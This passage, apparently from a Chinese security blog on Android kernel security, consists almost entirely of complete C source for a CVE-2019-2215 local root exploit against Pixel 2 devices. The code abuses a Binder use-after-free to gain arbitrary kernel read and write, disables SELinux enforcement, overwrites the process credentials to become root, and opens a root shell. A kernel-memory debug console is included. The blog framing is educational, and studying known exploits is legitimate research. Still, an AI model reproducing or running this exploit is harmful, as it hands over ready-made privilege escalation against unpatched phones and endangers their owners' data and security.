* [+] obtain arbitrary kernel memory R/W
* [+] find kernel base address
* launching debug console, enter 'help' for quick help
* debug> print
* ffffff9bad880000 kernel_base
* ffffff9baf8a57d0 init_task
* ffffff9baf8af2c8 init_user_ns
* ffffff9baf8e3780 selinux_enabled
* ffffff9bafc4e4a8 selinux_enforcing
* ffffffe6b2942b80 current
* debug> write ffffff9bafc4e4a8 01 00 00 00
* debug> exit
* taimen:/data/local/tmp $ getenforce
* Enforcing
* taimen:/data/local/tmp $
*
*/

#define _GNU_SOURCE
#include <ctype.h>
#include <err.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <linux/sched.h>
#include <sched.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/un.h>
#include <sys/utsname.h>
#include <sys/wait.h>
#include <unistd.h>

typedef uint8_t u8;
typedef uint32_t u32;
typedef uint64_t u64;

// #include <linux/android/binder.h>
#define BINDER_THREAD_EXIT 0x40046208ul
// NOTE: we don't cover the task_struct* here; we want to leave it uninitialized
#ifndef PAGE_SIZE
#define PAGE_SIZE 0x1000
#endif

/* Data structure definitions as found in the Sep 2019 QP1A.190711.020 build of
* Android 10 for walleye/taimen, kernel version-BuildID 4.4.177-g83bee1dc48e8.
* Verified using `pahole` on a build of the official Android kernel/msm git:
*
* https://android.googlesource.com/kernel/msm/+/refs/heads/android-msm-wahoo-4.4-android10
* (tree a4557a647a054b871bdf8e452a014cafa0ae5078)
*
* We leave only the fields in which we're interested, and we're really only
* interested in their offsets; the others_* fields are padding.
*
* (<original type> <offset> <size>)
*/
struct binder_thread {
u8 others_0[160];
u8 wait[24]; /* wait_queue_head_t 160 24 */
u8 others_1[216];
// u8 others_1[224]; /* NOTE: see binder_iovecs below */
} __attribute__((packed)); /* size: 408 in kernel, 400 here */

struct task_struct {
u8 others_0[1312];
u64 mm; /* struct mm_struct * 1312 8 */
u8 others_1[608];
u64 real_cred; /* const struct cred * 1928 8 */
u64 cred; /* const struct cred * 1936 8 */
u8 others_2[1736];
} __attribute__((packed)); /* size: 3680 */

struct mm_struct {
u8 others_0[768];
u64 user_ns; /* struct user_namespace * 768 8 */
u8 others_1[48];
} __attribute__((packed)); /* size: 824 */

struct cred {
u8 others_0[4];
u32 uid; /* kuid_t 4 4 */
u32 gid; /* kgid_t 8 4 */
u32 suid; /* kuid_t 12 4 */
u32 sgid; /* kgid_t 16 4 */
u32 euid; /* kuid_t 20 4 */
u32 egid; /* kgid_t 24 4 */
u32 fsuid; /* kuid_t 28 4 */
u32 fsgid; /* kgid_t 32 4 */
u32 securebits; /* unsigned int 36 4 */
u64 cap_inheritable; /* kernel_cap_t 40 8 */
u64 cap_permitted; /* kernel_cap_t 48 8 */
u64 cap_effective; /* kernel_cap_t 56 8 */
u64 cap_bset; /* kernel_cap_t 64 8 */
u64 cap_ambient; /* kernel_cap_t 72 8 */
u8 others_1[40];
u64 security; /* void * 120 8 */
u8 others_2[40];
} __attribute__((packed)); /* size: 168 */

struct task_security_struct {
u32 osid; /* u32 0 4 */
u32 sid; /* u32 4 4 */
u32 exec_sid; /* u32 8 4 */
u32 create_sid; /* u32 12 4 */
u32 keycreate_sid; /* u32 16 4 */
u32 sockcreate_sid; /* u32 20 4 */
} __attribute__((packed)); /* size: 24 */

/* Kernel symbol table offsets, relative to _head, in the QP1A.190711.020
* walleye/taimen kernel. The SELinux-related offsets were determined with
* reference to System.map and a minor bit of trial-and-error.
*/
const ptrdiff_t ksym_init_task = 0x20257d0;
const ptrdiff_t ksym_init_user_ns = 0x202f2c8;
const ptrdiff_t ksym_selinux_enabled = 0x2063780;
const ptrdiff_t ksym_selinux_enforcing = 0x23ce4a8;

/* The exploit relies upon a use-after-free by the kernel's epoll cleanup code
* resulting from an oversight in Android's Binder IPC subsystem, fixed here:
*
* https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/drivers/android/binder.c?h=linux-4.14.y&id=7a3cee43e935b9d526ad07f20bf005ba7e74d05b
*
* In the original Project Zero POC, arrays of 25 `struct iovec`s are treated
* as `struct binder_thread`s by the kernel. We do the same here via a union,
* which hopefully clarifies where the #defines of 25 and 10 came from in the
* original POC. Since we're using structure definitions for offsets only, we're
* fine cutting off 8 bytes from our definition of a `struct binder_thread` to
* ensure `sizeof(binder_iovecs) == sizeof(struct iovec[25]) == 400`.
*/
const size_t iovs_sz = sizeof(struct binder_thread) / sizeof(struct iovec);
const size_t iov_idx = offsetof(struct binder_thread, wait) / sizeof(struct iovec);
typedef union {
struct binder_thread bt;
struct iovec iovs[iovs_sz];
} binder_iovecs;

void kwrite(u64 kaddr, void *buf, size_t len);
void kread(u64 kaddr, void *buf, size_t len);
void kwrite_u64(u64 kaddr, u64 data);
void kwrite_u32(u64 kaddr, u32 data);
u64 kread_u64(u64 kaddr);
u64 kread_u32(u64 kaddr);

void prepare_globals(void);
void find_current(void);
void obtain_kernel_rw(void);
void find_kernel_base(void);
void patch_creds(void);
void launch_shell(void);
void launch_debug_console(void);

void con_loop(void);
int con_consume(char **token);
int con_parse_hexstring(char *token, u64 *val);
int con_parse_number(char *token, u64 *val);
int con_parse_hexbytes(char **token, u8 **data, size_t *len);
void con_kdump(u64 kaddr, size_t len);

void execute_stage(int op);
void notify_stage_failure(void);

int main(int argc, char *argv[]);

pid_t pid;
int debugging;
void *dummy_page;
int kernel_rw_pipe[2];
int binder_fd;
int epoll_fd;

u64 current;
u64 kernel_base;

void kwrite(u64 kaddr, void *buf, size_t len) {
    errno = 0;
    if (len > PAGE_SIZE)
        errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);
    if (write(kernel_rw_pipe[1], buf, len) != (ssize_t)len)
        err(1, "kwrite failed to load userspace buffer");
    if (read(kernel_rw_pipe[0], (void *)kaddr, len) != (ssize_t)len)
        err(1, "kwrite failed to overwrite kernel memory");
}
void kread(u64 kaddr, void *buf, size_t len) {
    errno = 0;
    if (len > PAGE_SIZE)
        errx(1, "kernel reads over PAGE_SIZE are messy, tried 0x%lx", len);
    if (write(kernel_rw_pipe[1], (void *)kaddr, len) != (ssize_t)len)
        err(1, "kread failed to read kernel memory");
    if (read(kernel_rw_pipe[0], buf, len) != (ssize_t)len)
        err(1, "kread failed to write out to userspace");
}
u64 kread_u64(u64 kaddr) {
    u64 data;
    kread(kaddr, &data, sizeof(data));
    return data;
}
u64 kread_u32(u64 kaddr) {
    u32 data;
    kread(kaddr, &data, sizeof(data));
    return data;
}
void kwrite_u64(u64 kaddr, u64 data) {
    kwrite(kaddr, &data, sizeof(data));
}
void kwrite_u32(u64 kaddr, u32 data) {
    kwrite(kaddr, &data, sizeof(data));
}

void prepare_globals(void) {
pid = getpid();

struct utsname kernel_info;
if (uname(&kernel_info) == -1)
err(1, "determine kernel release");
if (strcmp(kernel_info.release, "4.4.177-g83bee1dc48e8"))
warnx("kernel version-BuildID is not '4.4.177-g83bee1dc48e8'");

dummy_page = mmap((void *)0x100000000ul, 2 * PAGE_SIZE,
PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (dummy_page != (void *)0x100000000ul)
err(1, "mmap 4g aligned");
if (pipe(kernel_rw_pipe))
err(1, "kernel_rw_pipe");

binder_fd = open("/dev/binder", O_RDONLY);
epoll_fd = epoll_create(1000);
}

void find_current(void) {
/* Originally: void leak_task_struct(void); */
struct epoll_event event = {.events = EPOLLIN};
if (epoll_ctl(epoll_fd, EPOLL_CTL_ADD, binder_fd, &event))
err(1, "epoll_add");

binder_iovecs bio;
memset(&bio, 0, sizeof(bio));
bio.iovs[iov_idx].iov_base = dummy_page; /* spinlock in the low address half must be zero */
bio.iovs[iov_idx].iov_len = PAGE_SIZE; /* wq->task_list->next */
bio.iovs[iov_idx + 1].iov_base = (void *)0xdeadbeef; /* wq->task_list->prev */
bio.iovs[iov_idx + 1].iov_len = PAGE_SIZE;

int pipe_fd[2];
if (pipe(pipe_fd))
err(1, "pipe");
if (fcntl(pipe_fd[0], F_SETPIPE_SZ, PAGE_SIZE) != PAGE_SIZE)
err(1, "pipe size");
static char page_buffer[PAGE_SIZE];

pid = fork();
if (pid == -1)
err(1, "fork");
if (pid == 0) {
/* Child process */
prctl(PR_SET_PDEATHSIG, SIGKILL);
sleep(2);
epoll_ctl(epoll_fd, EPOLL_CTL_DEL, binder_fd, &event);
// first page: dummy data
if (read(pipe_fd[0], page_buffer, PAGE_SIZE) != PAGE_SIZE)
err(1, "read full pipe");
close(pipe_fd[1]);
exit(0);
}

ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
ssize_t writev_ret = writev(pipe_fd[1], bio.iovs, iovs_sz);
if (writev_ret != (ssize_t)(2 * PAGE_SIZE))
errx(1, "writev() returned 0x%lx, expected 0x%lx", /* errx() appends the newline */
writev_ret, (ssize_t)(2 * PAGE_SIZE));
// second page: leaked data
if (read(pipe_fd[0], page_buffer, PAGE_SIZE) != PAGE_SIZE)
err(1, "read full pipe");

int status; /* wait() expects an int *, not a pid_t * */
if (wait(&status) != pid)
err(1, "wait");

current = *(u64 *)(page_buffer + 0xe8);
}
void obtain_kernel_rw(void) {
/* Originally: void clobber_addr_limit(void); */
struct epoll_event event = {.events = EPOLLIN};
if (epoll_ctl(epoll_fd, EPOLL_CTL_ADD, binder_fd, &event))
err(1, "epoll_add");

binder_iovecs bio;
memset(&bio, 0, sizeof(bio));
bio.iovs[iov_idx].iov_base = dummy_page; /* spinlock in the low address half must be zero */
bio.iovs[iov_idx].iov_len = 1; /* wq->task_list->next */
bio.iovs[iov_idx + 1].iov_base = (void *)0xdeadbeef; /* wq->task_list->prev */
bio.iovs[iov_idx + 1].iov_len = 0x8 + 2 * 0x10; /* iov_len of previous, then this element and next element */
bio.iovs[iov_idx + 2].iov_base = (void *)0xbeefdead;
bio.iovs[iov_idx + 2].iov_len = 8; /* should be correct from the start, kernel will sum up lengths when importing */

u64 second_write_chunk[] = {
1, /* iov_len */
0xdeadbeef, /* iov_base (already used) */
0x8 + 2 * 0x10, /* iov_len (already used) */
current + 0x8, /* next iov_base (addr_limit) */
8, /* next iov_len (sizeof(addr_limit)) */
0xfffffffffffffffe /* value to write */
};

int socks[2];
if (socketpair(AF_UNIX, SOCK_STREAM, 0, socks))
err(1, "socketpair");
if (write(socks[1], "X", 1) != 1)
err(1, "write socket dummy byte");

pid = fork();
if (pid == -1)
err(1, "fork");
if (pid == 0) {
/* Child process */
prctl(PR_SET_PDEATHSIG, SIGKILL);
sleep(2);
epoll_ctl(epoll_fd, EPOLL_CTL_DEL, binder_fd, &event);
size_t write_sz = sizeof(second_write_chunk);
if (write(socks[1], second_write_chunk, write_sz) != (ssize_t)write_sz)
err(1, "write second chunk to socket");
exit(0);
}

ioctl(binder_fd, BINDER_THREAD_EXIT, NULL);
struct msghdr msg = {.msg_iov = bio.iovs, .msg_iovlen = iovs_sz};
size_t recvmsg_sz = bio.iovs[iov_idx].iov_len +
bio.iovs[iov_idx + 1].iov_len +
bio.iovs[iov_idx + 2].iov_len;
ssize_t recvmsg_ret = recvmsg(socks[0], &msg, MSG_WAITALL);
if (recvmsg_ret != (ssize_t)recvmsg_sz)
errx(1, "recvmsg() returned %ld, expected %lu", recvmsg_ret, recvmsg_sz);

setbuf(stdout, NULL);
}
void find_kernel_base(void) {
u64 current_mm = kread_u64(current + offsetof(struct task_struct, mm));
u64 current_user_ns = kread_u64(current_mm + offsetof(struct mm_struct, user_ns));
kernel_base = current_user_ns - ksym_init_user_ns;
if (kernel_base & 0xffful) {
if (debugging) {
warnx("bad kernel base (not 0x...000)");
kernel_base = 0;
return;
} else {
errx(1, "bad kernel base (not 0x...000)");
}
}

u64 init_task = kernel_base + ksym_init_task;
u64 cred_ptrs[2] = {
kread_u64(init_task + offsetof(struct task_struct, real_cred)), /* init_task.real_cred */
kread_u64(init_task + offsetof(struct task_struct, cred)), /* init_task.cred */
};

/* Examine what we think are the init process' credentials.
* Presumably, these tests are unlikely to pass unless we have the right
* kernel base, kernel symbol offsets, and kernel data structure offsets.
*/
for (int cred_idx = 0; cred_idx < 2; cred_idx++) {
struct cred cred;
kread(cred_ptrs[cred_idx], &cred, sizeof(struct cred));

if (cred.uid || cred.gid || cred.suid || cred.sgid ||
cred.euid || cred.egid || cred.fsuid || cred.fsgid) {
if (debugging) {
warnx("bad kernel base (init_task not where expected)");
kernel_base = 0;
return;
} else {
errx(1, "bad kernel base (init_task not where expected)");
}
}

const u64 cap = 0x3fffffffff;
if (cred.cap_inheritable || cred.cap_permitted != cap ||
cred.cap_effective != cap || cred.cap_bset != cap ||
cred.cap_ambient) {
if (debugging) {
warnx("bad kernel base (init_task not where expected)");
kernel_base = 0;
return;
} else {
errx(1, "bad kernel base (init_task not where expected)");
}
}

/* .real_cred == .cred, probably. */
if (cred_ptrs[0] == cred_ptrs[1])
break;
}
}
void patch_creds(void) {
u64 cred_ptrs[2] = {
kread_u64(current + offsetof(struct task_struct, real_cred)), /* current->real_cred */
kread_u64(current + offsetof(struct task_struct, cred)), /* current->cred */
};

/* Final check: our struct cred(s?) in the kernel should contain our uid. */
if (kread_u32(cred_ptrs[0] + offsetof(struct cred, uid)) != getuid())
errx(1, "bad cred (current->real_cred->uid not our own uid)");
if (cred_ptrs[0] != cred_ptrs[1])
if (kread_u32(cred_ptrs[1] + offsetof(struct cred, uid)) != getuid())
errx(1, "bad cred (current->cred->uid not our own uid)");

/* Just disabling selinux_enforcing should suffice for our purposes. SELinux
* still does MAC (mandatory access control) checks on our actions based on
* our security contexts, but violations are logged, not prevented. Our
* permissions then fall back to DAC (discretionary access control), i.e.
* user accounts/groups. And as we know, the root user is DAC omnipotent.
*/
// kwrite_u32(kernel_base + ksym_selinux_enabled, 0);
kwrite_u32(kernel_base + ksym_selinux_enforcing, 0);

/* Patch our struct cred(s?) in the kernel. */
for (int cred_idx = 0; cred_idx < 2; cred_idx++) {
u64 cred_ptr = cred_ptrs[cred_idx];

/* All 8 (e|f?s)?[ug]id members should be set to 0, making us root. */
kwrite_u32(cred_ptr + offsetof(struct cred, uid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, gid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, suid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, sgid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, euid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, egid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, fsuid), 0);
kwrite_u32(cred_ptr + offsetof(struct cred, fsgid), 0);

/* What to do with securebits is not as obvious. The comment for it in
* the kernel source reads 'SUID-less security management'. In the init
* process' cred(s?), this is set to 0, so we might as well do the same.
*/
kwrite_u32(cred_ptr + offsetof(struct cred, securebits), 0);

/* All 5 cap_.+ members should be bitset to all 1's. We will have all
* capability bits set, and our children will be able to inherit them.
*/
kwrite_u64(cred_ptr + offsetof(struct cred, cap_inheritable), ~(u64)0);
kwrite_u64(cred_ptr + offsetof(struct cred, cap_permitted), ~(u64)0);
kwrite_u64(cred_ptr + offsetof(struct cred, cap_effective), ~(u64)0);
kwrite_u64(cred_ptr + offsetof(struct cred, cap_bset), ~(u64)0);
kwrite_u64(cred_ptr + offsetof(struct cred, cap_ambient), ~(u64)0);

/* Also patch our task_security_struct(s?). This is not necessary with
* SELinux bypassed, but we will again match init's settings and set
* the osid and sid members to 1.
*/
u64 security_ptr = kread_u64(cred_ptr + offsetof(struct cred, security));
kwrite_u32(security_ptr + offsetof(struct task_security_struct, osid), 1);
kwrite_u32(security_ptr + offsetof(struct task_security_struct, sid), 1);

/* .real_cred == .cred, probably. */
if (cred_ptrs[0] == cred_ptrs[1])
break;
}

if (getuid())
errx(1, "did some patching, but our uid is not 0");
}
void launch_shell(void) {
if (execl("/bin/sh", "/bin/sh", (char *)NULL) == -1)
err(1, "launch shell");
}
void launch_debug_console(void) {
printf("launching debug console; enter 'help' for quick help\n");
con_loop();
}

void con_loop(void) {
u64 kaddr;
size_t len;

int running = 1;
while (running) {
printf("debug> ");

char *line = NULL;
size_t getline_buf_len = 0;
if (getline(&line, &getline_buf_len, stdin) == -1)
err(1, "read stdin");
int was_handled = 0;

char *token = strtok(line, " \t\r\n\a");
if (token && !strcmp(token, "print") && con_consume(&token)) {
printf("%lx kernel_base\n", kernel_base);
printf("%lx init_task\n", kernel_base + ksym_init_task);
printf("%lx init_user_ns\n", kernel_base + ksym_init_user_ns);
printf("%lx selinux_enabled\n", kernel_base + ksym_selinux_enabled);
printf("%lx selinux_enforcing\n", kernel_base + ksym_selinux_enforcing);
printf("%lx current\n", current);
was_handled = 1;
} else if (token && !strcmp(token, "read")) {
/* Not that there'd actually be any kmem allocated there, but if the
* read address were 0xffffffffffffffff, we'd technically be able to
* read exactly one byte. We ~do~ want to handle that case... right?
*/
if (con_parse_hexstring(strtok(NULL, " \t\r\n\a"), &kaddr) &&
con_parse_number(strtok(NULL, " \t\r\n\a"), &len) &&
con_consume(&token) && 0 < len && len <= PAGE_SIZE &&
len - 1 <= ~(u64)0 - kaddr) {
con_kdump(kaddr, len);
was_handled = 1;
}
} else if (token && !strcmp(token, "write")) {
u8 *data = NULL;
if (con_parse_hexstring(strtok(NULL, " \t\r\n\a"), &kaddr) &&
con_parse_hexbytes(&token, &data, &len) && 0 < len &&
len <= PAGE_SIZE && len - 1 <= ~(u64)0 - kaddr) {
kwrite(kaddr, data, len);
was_handled = 1;
}
free(data);
} else if (token && !strcmp(token, "shell") && con_consume(&token)) {
pid = fork();
if (pid == -1)
err(1, "fork");
if (pid == 0)
launch_shell();
int status; /* waitpid() expects an int *, not a pid_t * */
do {
waitpid(pid, &status, WUNTRACED);
} while (!WIFEXITED(status) && !WIFSIGNALED(status));
was_handled = 1;
} else if (token && !strcmp(token, "help") && con_consume(&token)) {
printf(
"quick help\n"
" print\n"
" print kernel base address, some kernel symbol offsets,\n"
" and address of current task_struct as hexstrings\n"
" read <kaddr> <len>\n"
" read <len> bytes from <kaddr> and display as a hexdump\n"
" <kaddr> is a hexstring not prefixed with 0x\n"
" <len> is 1-4096 or 0x1-0x1000\n"
" write <kaddr> <data>\n"
" write <data> to <kaddr>\n"
" <kaddr> is a hexstring not prefixed with 0x\n"
" <data> is 1-4096 hexbytes, spaces ignored, to be written *AS-IS*\n"
" e.g. if kaddr 0xffffffffdeadbeef contains an int, and you want to set\n"
" its value to 1, enter 'write ffffffffdeadbeef <data>', where <data> is\n"
" '01000000', '0100 0000', '01 00 0 0 00', etc. (our ARM is little-endian)\n"
" shell\n"
" launch a shell (hint: have we ~somehow~ become another user? :P)\n"
" help\n"
" print this help\n"
" exit\n"
" exit debug console\n");
was_handled = 1;
} else if (token && !strcmp(token, "exit") && con_consume(&token)) {
running = 0;
was_handled = 1;
}

if (!was_handled)
printf("woopz; enter 'help' for quick help\n");

free(line);
}
}
int con_consume(char **token) {
int ret = 1;
do {
if ((*token = strtok(NULL, " \t\r\n\a")))
ret = 0;
} while (*token);
return ret;
}
int con_parse_hexstring(char *token, u64 *val) {
if (!token || !(*token))
return 0;
*val = 0;
while (*token) {
if (*val & 0xf000000000000000)
return 0;
else if ('0' <= *token && *token <= '9')
*val = *val * 16 + *token - '0';
else if ('a' <= *token && *token <= 'f')
*val = *val * 16 + *token - 'a' + 10;
else if ('A' <= *token && *token <= 'F')
*val = *val * 16 + *token - 'A' + 10;
else
return 0;
token++;
}
return 1;
}
int con_parse_number(char *token, u64 *val) {
if (!token || !(*token))
return 0;
if (*token == '0' && (token[1] == 'x' || token[1] == 'X'))
return con_parse_hexstring(token + 2, val);
*val = 0;
while (*token) {
if (*token < '0' || '9' < *token)
return 0;
*val = *val * 10 + *token - '0';
if (*val > PAGE_SIZE)
return 0;
token++;
}
return 1;
}
int con_parse_hexbytes(char **token, u8 **data, size_t *len) {
static char hexbyte[2 + 1] = {'\0'};

u8 *buf = malloc(PAGE_SIZE * sizeof(u8));
if (!buf)
err(1, "allocate memory");

*data = buf;
*len = 0;
int hexbyte_idx = 0;

while ((*token = strtok(NULL, " \t\r\n\a"))) {
for (char *c = *token; *c; c++) {
if (!isxdigit(*c))
return 0;
hexbyte[hexbyte_idx++] = *c;
if (hexbyte_idx == 2) {
hexbyte_idx = 0;
u64 val;
if (*len == PAGE_SIZE || !con_parse_hexstring(hexbyte, &val))
return 0;
buf[(*len)++] = (u8)(val & 0xff);
}
}
}

return *len && !hexbyte_idx;
}
void con_kdump(u64 kaddr, size_t len) {
/* Mimic the output of `xxd`. */
static char line[40 + 1] = {'\0'};
static char text[16 + 1] = {'\0'};

if (!len)
return;

u8 *buf = malloc(len * sizeof(u8));
if (!buf)
err(1, "allocate memory");

kread(kaddr, buf, len);

for (u64 line_offset = 0; line_offset < len; line_offset += 16) {
char *linep = line;
for (size_t i = 0; i < 16; i++) {
if (i + line_offset < len) {
u8 c = buf[i + line_offset]; /* u8, not char: %02x sign-extends a negative char and overflows the line buffer */
linep += sprintf(linep, (i & 1) ? "%02x " : "%02x", c);
text[i] = (' ' <= c && c <= '~') ? c : '.';
} else {
linep += sprintf(linep, (i & 1) ? " " : " ");
text[i] = ' ';
}
}
printf("%016lx: %s %s\n", kaddr + line_offset, line, text);
}

free(buf);
}

/* Excuse this mess; bionic libc doesn't have on_exit(). */
char *stage_desc;
struct stage_t {
void (*func)(void);
char *desc;
};
struct stage_t stages[] = {
{prepare_globals, "startup"},
{find_current, "find kernel address of current task_struct"},
{obtain_kernel_rw, "obtain arbitrary kernel memory R/W"},
{find_kernel_base, "find kernel base address"},
{patch_creds, "bypass SELinux and patch current credentials"},
{launch_shell, NULL},
{launch_debug_console, NULL},
};
void execute_stage(int stage_idx) {
stage_desc = stages[stage_idx].desc;
(*stages[stage_idx].func)();
if (stage_desc && pid && (stage_idx != 3 || kernel_base))
printf("[+] %s\n", stage_desc);
}
void notify_stage_failure(void) {
if (stage_desc && pid)
fprintf(stderr, "[-] %s failed\n", stage_desc);
}

int main(int argc, char *argv[]) {
atexit(notify_stage_failure);
debugging = argc == 2 && !strcmp(argv[1], "debug");

printf("Temproot for Pixel 2 and Pixel 2 XL via CVE-2019-2215\n");

execute_stage(0); /* prepare_globals() */
execute_stage(1); /* find_current() */
execute_stage(2); /* obtain_kernel_rw() */
execute_stage(3); /* find_kernel_base() */

if (debugging) {
if (!kernel_base) {
notify_stage_failure();
warnx("printed kernel offsets won't be reliable"); /* warnx() appends the newline */
}
execute_stage(6); /* launch_debug_console() */
} else {
execute_stage(4); /* patch_creds() */
execute_stage(5); /* launch_shell() */
}

return 0;
}

image-20241212112523545

Syzkaller For Android Kernel

Please refer to 《Syzkaller源码分析及利用》.

  • Title: Android安全-内核篇
  • Author: 韩乔落
  • Created at : 2024-10-22 15:21:46
  • Updated at : 2025-12-24 15:42:49
  • Link: https://jelasin.github.io/2024/10/22/Android安全-内核篇/
  • License: This work is licensed under CC BY-NC-SA 4.0.